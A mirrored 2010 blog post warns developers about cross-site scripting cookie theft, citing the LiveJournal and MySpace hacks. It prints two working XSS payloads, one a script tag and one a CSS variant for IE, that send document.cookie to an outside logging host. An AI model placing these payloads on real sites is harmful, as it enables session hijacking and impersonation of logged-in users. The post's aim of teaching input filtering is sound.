This is a mirror of official site: http://jasper-net.blogspot.com/

XSS – Stealing Cookies 101

| Sunday, May 16, 2010
Stealing cookies is easy. Never trust a client to be who you think it is. Just because it was trusted a few seconds ago, doesn't mean it will be in a few seconds, ESPECIALLY if a cookie is all you use to identify a client.

A recent LiveJournal hack has brought this to light again. Back when MySpace was hacked in October it reminded us that we must be vigilant in filtering text which users post because a hacker could smuggle in some javascript code to maliciously use the site from the browsers of authenticated users.

By stealing a users cookies as the LiveJournal hack did, you don't even have to cary out the attack in the users browser; you can do it elsewhere. Worst of all stealing cookies is EASY TO DO, and HARD TO PROTECT AGAINST.

Easy to do?

<script>
new Image(). src="http://jehiah.com/_sandbox/log.cgi?c=" +encodeURI(document.cookie);
</script>

That was it. If i can get that code on a site where you are authenticated, I can become you.
We can also use another method in IE. Execute the javascript in CSS.


<style>
.getcookies{background-image:url('javascript:new Image(). src="http://jehiah.com/_sandbox/log.cgi?c=" +encodeURI(document.cookie);');}
</style>
<p class="getcookies"></p>

Any time you let users post text and you don't religiously restrict the content, they can steal sessions. Scarry? If you are a developer it better scare the hell out of you.

Read more: Jehiah

Posted via email from jasper22's posterous

0 comments: